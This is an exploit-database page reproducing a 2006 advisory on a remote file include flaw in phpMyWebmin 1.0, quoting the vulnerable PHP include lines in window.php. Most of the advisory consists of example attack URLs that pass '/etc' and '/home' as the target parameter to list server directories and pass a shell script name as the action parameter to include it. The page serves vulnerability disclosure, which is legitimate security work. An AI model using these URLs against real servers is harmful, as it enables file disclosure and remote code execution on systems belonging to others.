[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

phpMyWebmin 1.0 (window.php) Remote File Include Vulnerability

Author
Kernel-32
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-903
Category
web applications
Date add
27-09-2006
Platform
unsorted
==============================================================
phpMyWebmin 1.0 (window.php) Remote File Include Vulnerability
==============================================================


#######################################
+PHP MyWebMin 1.0 Remote File Include
+Advisory #5
+Product :PHP MyWebMin
+Vulnerable: Remote File Includes
+Risk:High
+Class:Remote
+Discovered:by Kernel-32
+Greetz: BeLa ;)
########################################

Vulnerable File:window.php
$ordner = opendir("$target");
?>

and

include("$target/preferences.php");

if($action != "")
{
include("$action.php");
?>

Examples:
http://site/path/window.php?target=/etc
http://site/path/home.php?target=/home
http://site/path/window.php?action=Shell.php




#  0day.today [2024-06-30]  #